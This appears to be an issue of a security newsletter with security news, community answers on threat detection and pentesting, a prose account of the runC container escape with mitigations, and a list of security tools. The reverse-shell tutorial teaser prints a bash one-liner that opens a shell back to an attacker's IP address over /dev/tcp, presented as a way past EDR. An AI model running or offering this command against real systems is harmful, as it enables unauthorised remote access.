SecPro #17: Community Wisdom, Bypassing Locked Environments, Ghidra2frida
In this Issue
- Recent Security Issues & HITB 2021 Singapore
- SecPro Community Wisdom
- Bypassing Locked-Down Environments to Get Reverse Shells
- How to Break a Container – The RunC Vulnerability
- Build or Buy Modern SIEM: Top 3 Considerations
- Secret Knowledge
Recent Security Issues
Microsoft warns about an open redirect phishing campaign
Microsoft is tracking a credential phishing campaign that uses open redirect links to manipulate users into visiting maliciously crafted websites. Microsoft says that the threat actors behind the attacks have used more than 350 unique domains. Read more.
Microsoft fixed a security issue in Azure Cosmos DB
Microsoft mitigated a vulnerability (aka ChaosDB) in Azure Cosmos DB that could have been exploited to allow users to access other users’ resources. The flaw was present for approximately two years before Microsoft addressed it earlier this month. Microsoft was alerted to the issue by researchers from Wiz. Read more. My take on this episode is that enterprises can’t simply trust cloud providers to protect their infrastructure. You should actively adopt a zero-trust model and ID-based authentication as part of your cloud security strategy.
Bluetooth bugs open billions of devices to DoS and code execution
The bugs are found in the closed commercial BT stack used by at least 1,400 embedded chip components, that can lead to a host of attack types – mainly denial of service (DoS) via firmware crashes (“brak” in Norwegian is “crash”). One of the bugs can also lead to arbitrary code execution (ACE). Read more.
HITB 2021 Singapore
Security Technology Arms Race 2021: Medal Event
HITB keynote on why offensive security has had the advantage in the past and what the future looks like.
Hack in the Box 2021 Singapore Slides
A collection of offensive-focused talks from the HITB 2021 event.
SecPro Community Wisdom
You were right! The community is right! I’m very excited to share SecPro’s latest initiative – community wisdom – which aims to benefit the community as a whole through shared learning. In this section, I’ll present in-depth conversations with our community members. Special thanks to some of our esteemed members who helped answer key questions within the threat detection and pentesting domains. Stay tuned!
Themes in Threat Detection & Monitoring
1- Monitoring Insider Threats
“Havoc caused by a disgruntled employee with internal access. Have you encountered this in the past? How did you successfully detect and respond to insider threats?”
- Perform enterprise-wide risk assessments.
- Clearly document and consistently enforce policies and controls.
- Implement security software and appliances.
- Enable mailbox journaling on your Exchange Server.
- Monitor and control remote access from all endpoints.
- Harden network perimeter security. Configure your firewall properly.
- Enable surveillance. Monitor all critical facilities in your company.
- Enforce separation of duties and least privilege.
Peter: Not yet, fortunately, but fine-tuned RBAC and access log monitoring can prevent that.
John: Absolutely. The insider threat is not new. What is new is the far-reaching impact to our digital infrastructure and way of life. The key to detecting and thwarting the insider threat is deploying advanced user behavior analytics. Know your people and know the behaviors that indicate potential problems. Finally, use the “whole of organization” approach. Countering the insider threat needs experts from human resources, legal, medical, and cyber.
2- Zero-Day Exploits
“New attacks have new patterns that may have long been similar to normal user behavior and go unnoticed. The time interval between the occurrence of such attacks and the time they should be detected by the analyst, if it is large, will inflict adverse blows on the organization. My constant concern is the prolongation of this time interval. How should I tackle this?”
Hans: Key Signs your company should look for when you think you have been attacked with a zero-day exploit:
- Unexpected traffic on a valid/legit port.
- Unexpected potentially legitimate traffic or substantial scanning activity originating from a server/client.
- Similar behavior from the compromised client or server even after the latest patches have been applied.
Nowel: It is important to stay up-to-date with the new patterns and keep learning, especially trying to learn about how threats are adapting to cloud services. This usually means as well to learning new tools and approaches. Break down a threat into detectable components and automate parts of the detection process whatever is possible.
Peter: I think that new attacks target large organizations and big fishes, they have way more power to detect and countermeasure. Learn from the big ones.
Joe: The only solution for this is vigilance. Someone must be monitoring logins and security logs either manually or with the assistance of some automation tool. My experience is all with small networks (less than 50 users) in small businesses. If the business does not have the personnel it must be outsourced, but it cannot be ignored.
3- How to Get Started with Threat Detection
“If you were to give one piece of advice to someone new to threat detection and response what would that be? Where/what topic should they start?”
Hans: IOCs are becoming less useful as attackers don’t reuse them, sometimes even inside the same victim. Focus on TTPs & behaviors.
Nowel: ML (Machine learning) tools to transform threat detection capabilities for SecOps teams.
Peter: Definitely AI, you can detect things by good training formulas way earlier.
John: Cyberthreats against our nation are increasing in both quantity and sophistication. Our very way of life is at risk and we need smart and capable people to get into cyber, specifically threat detection. Roughly 30% of all cyber jobs are in a Security Operations Center (SOC) or perform other cyber analysis tasks.
Themes in Penetration Testing
1- Where to Practice Ethical Hacking Skills?
“I want to become a penetration tester, but the thing that worries me the most is where to experiment and practice my ethical hacking skills? Where to get the best hacking stories and practice?”
Brandon: The search for relevant information is perhaps my biggest issue with regards to pentesting and ethical hacking. There are plenty of programs that allow ethical hacking, but fewer good sources of up-to-date information that is both trustworthy and will give you an edge in this competitive field.
George: Start installing the most popular OS on a Virtual machine and follow the Packt tutorials.
Prasoon: For a Beginner, TryHackme is an awesome platform to start with, and learning the basics they have various rooms where you can practice based on your skill level. Also, recommend eLearnsecurity/INE eJPT Certification for beginners. As you gain experience Hack the Box is the Best platform for experience Pentesters.
Joe: I’ve found hands-on is essential in this business. I recommend two sources: enter free Capture-the-Flag contests and purchase a Tryhackme subscription (only $8/month if you have an .edu email or $10/month if not). Between these two sources and for minimal cost, you can learn and polish your pentesting skills in a safe environment.
2- What’s New in Pentesting?
“What is the most exciting thing in pentesting/red teaming right now for you and why should other community members be inspired to learn it?
Brandon: The potential to make money with bug bounties is what excites me most about ethical hacking. That and the sense of achievement when you find a vulnerability that nobody else has.
Prasoon: Pentesting/Red Teaming always pushes you to learn new technologies and right now for me Cloud Penetration Testing is very exciting as it provides a new paradigm for Pentesting/Red Teaming. As more and more organizations are moving towards Cloud and using Cloud Platforms for their workloads this would be one of the most sought-after skills in the near future.
Nowel: To make pentesting part of the CI/CD pipelines and/or make it part of Chaos testing in order understand the weakness of your infrastructure.
Joe: Red teaming is gaining a lot of traction as cyber-attacks increase in quantity and sophistication. We need smart and diverse people to combat the threats.
Bypassing Locked-Down Environments to Get Reverse Shells
by Karl Gilbert
Bypassing Locked Environments: Locked-down environments are designed to be highly secure and resistant to intrusion attempts. Most of the time, in such environments there would be EDR running on the server that would make it very difficult to download reverse shell binaries. Therefore, we will have to use system tools that are already available to us to get reverse shells back to our attacker system. These include system tools like shb, ncat, socat, bash, python, etc. Let’s take a look at how these system tools can be utilized to swapn Reverse Shells:
Bash shells can be created by opening a port directly on /dev/tcp or /dev/udp and then interacting it with bash.
TCP: /bin/bash -i >& /dev/tcp/<<IP Address>>/443 0>&1
Read the full tutorial HERE.
How to Break a Container – The RunC Vulnerability
By Austin Miller
The most common complaint about container security is the threat of container escape – being able to break out of the container either through tricking the host or through escalated permissions.
The most common container breakout vulnerability was found in Docker’s containers – namely, the runC vulnerability. Discovered by Iwaniuk and Popławski in 2019, it has since been patched. But it is not easy for people trying to run low memory containers – the patch increases the demands that are placed on the host system.
How did the runC vulnerability work and how can we make sure that it is not a danger to our systems?
The runC Vulnerability – What Happens?
runC is a “lightweight universal container runtime” that was created by Docker to unify low-level components into one runtime. Docker themselves describe runC as being “designed for security”, but (ironically) it was easy for large-scale enterprises using this container to being exposed to significant risks.
Starting the Exploitation
There are two key processes that start off the runC vulnerability:
- /proc/self/exe, a misconfigured path that allows a user to access the host’s runC binary
- A file descriptor mishandling error, which allows the above path to be written
Running the runC vulnerability is a four-part process that is relatively simple exploits using a malicious image and native Linux commands to gain root-level permissions.
Loading The Malicious Image
When an attacker tries to escape the Docker container, they will first install runC (if it is not already installed). This would probably not set off any deep concerns for most security teams, but it allows a malicious actor to then overwrite the stored standard runC linked library with a malicious image.
The image itself simply needs to be stored in a target-accessible location, which will depend on the environment that the threat actor is trying to infiltrate.
Bypassing Locked Environments: Running /proc/self/exe
When the image is loaded and ready to be accessed, the attacker can point a common entrypoint script or binary that the average user would probably use towards /proc/self/exe – Iwaniuk and Popławski gave /bin/bash as a common example.
/proc/self/exe allows the container to load runC’s required libraries from the host binary – now the attacker has full access to the system! This allows the attacker to gain root-level access from within the container and they can manipulate it from within Docker.
Bypassing Locked Environments: Starting The Malicious Process
When the container is pointed at /proc/self/exe and the malicious library is ready, the threat actor will boot the malicious linked library to the container.
From this point, the attacker can now gain access to the host system. Opening /proc/self/exe in read-only mode gives the misconfigured file descriptor. This can then be fed back into the container as:
/proc/self/fed/<file descriptor from the above command>
The attacker is now pointed towards the host runC binary. They will close /proc/self/exe as is no longer used in the shell – restarting the process will allow the attacker to now access the binary with write permissions.
Bypassing Locked Environments: Killing The Process And Gaining Control
The attacker kills the process and opens /proc/self/fd/<file descriptor from the above command> in write mode. This then fully loads the malicious image to the container, meaning that they have root-level access through the malicious image.
And with only limited knowledge of bash, any threat actor could escape the container and gain control of the host system.
Bypassing Locked Environments: Defending Against The runC Vulnerability
Although Iwaniuk and Popławski offered a number of failed patching attempts in their white paper, the patch was eventually released that stopped via a patched released by Docker for the runC runtime. Updating and fixing the patch to Docker and runC is the best course of action.
If that is not possible, security teams can place blocks on untrusted registries on containers. This method will constrict the number of custom container images that can be loaded, but it is the most effective way of stopping the vulnerability from being an exploit (even if the attacker can still make Docker point towards /proc/self/exe).
Similarly, settings that stop internal container processes from overwriting the host runC binary will stop attackers in their tracks. SELinux is one of the best methodologies for mitigating vulnerability by Bypassing Locked Environments.
Detection & Response
Build or Buy Modern SIEM: Top 3 Considerations
Every security team faces this question of whether to buy or build a security solution that they need to ingest terabytes of security log data, monitor, and alert to be able to detect and respond to attacks. Companies today rely heavily on SaaS applications and multi-cloud infrastructure — all of which generate massive amounts of logs.
Detection at scale is hard
The truth is that the majority of legacy SIEM platforms weren’t designed for detection at scale. Their architectures weren’t probably designed for the cloud. These platforms were designed as general logging solutions that are trying to solve modern security analytics problems but often aren’t purpose-built to work with a terabyte or exabyte scale security data.
In this article, I’ll examine 3 key considerations that can help security teams make informed decisions about whether to buy or build their security stack especially when operationalizing massive security data with cloud-first architectures and developer-driven workflows.
1- Are you centralizing or collecting data from the right log sources?
The key question here is how much native support does your security solution or SIEM provide for log sources? Some of the primary log sources you’d be inspecting could be:
- Cloud logs (from providers like AWS or GCP)
- SaaS application logs
- Network logs
- Host logs
- Application logs
Many times, companies try to guesswork without making informed data source predictions just to keep the costs low. This is a trap. Instead, teams should focus on achieving more than adequate security even at the expense of incurring extra costs simply because data breaches can prove costly both in terms of money and loss of reputation. Be sure to include all the data sources you could and should be working with as well.
2- Are you factoring in the scale and resources?
Another point to consider whether you’re buying a SIEM or building a home-grown solution is that as your organization grows, you will have even more data sources that need to be centralized and normalized. It’d be worth considering how are you placed with the time it will take (several months or a year) to build your home-grown solution and then factor in the maintenance activities associated in the long term such as patching or adding more detections and logic.
If you’re going for a home-grown security solution, it’s best to account for the resources beforehand. The quality of engineering talent is key and you might even require a large team for continuous development and maintenance of your build. The team must also ensure that your security solution stays future-proof through the addition of new features to ensure you’re maintaining the expected security posture and visibility of your environment and infrastructure.
3- Speed of forensics and having an “analyst-friendly” solution
A truly modern security solution should be able to help security analysts quickly correlate IOCs (Indicators of Compromise) across data sources to detect and investigate malicious activity early in the attack sequence. Speedy and accurate investigations and forensics across a large data set is an important consideration whether you are building or buying.
- ThreatStack: To build or buy your own security platform
- Panther: Buy or Build Your Security Solution
- Sentinelone: Why XDR vendors must build, buy, and partner
Discover useful security resources, cheatsheets, hacks, one-liners, and open-source CLI/web tools.
- ghidra2frida – The new bridge between Ghidra and Frida– A new Ghidra extension that bridges Ghidra and Frida, enabling you to create powerful scripts that take advantage of Frida’s dynamic analysis engine to improve Ghidra’s static analysis features.
- pwnesia/dnstake – A fast tool to check missing hosted DNS zones that can lead to subdomain takeover.
- pwntools – CTF framework and exploit development library.
- pentestpackage – is a package of Pentest scripts.
- python-pentest-tools – python tools for penetration testers.
- Lynis – battle-tested security tool for systems running Linux, macOS, or Unix-based operating system.
- LinEnum – scripted Local Linux Enumeration & Privilege Escalation Checks.
- Rkhunter – scanner tool for Linux systems that scans backdoors, rootkits, and local exploits on your systems.
- PE-sieve – is a lightweight tool that helps to detect malware running on the system.
100+ Blue Team Folks to Follow on Twitter
A useful list of 100+ Blue Team folks to follow on Twitter.
Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems
An in-depth study published by Trend Micro says “50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited..”
The SecPro is a weekly security newsletter to help you stay sharp and upgrade your skills with trending threat insights, practical tutorials, hands-on labs, and useful resources. Build skills in as little as 10 minutes.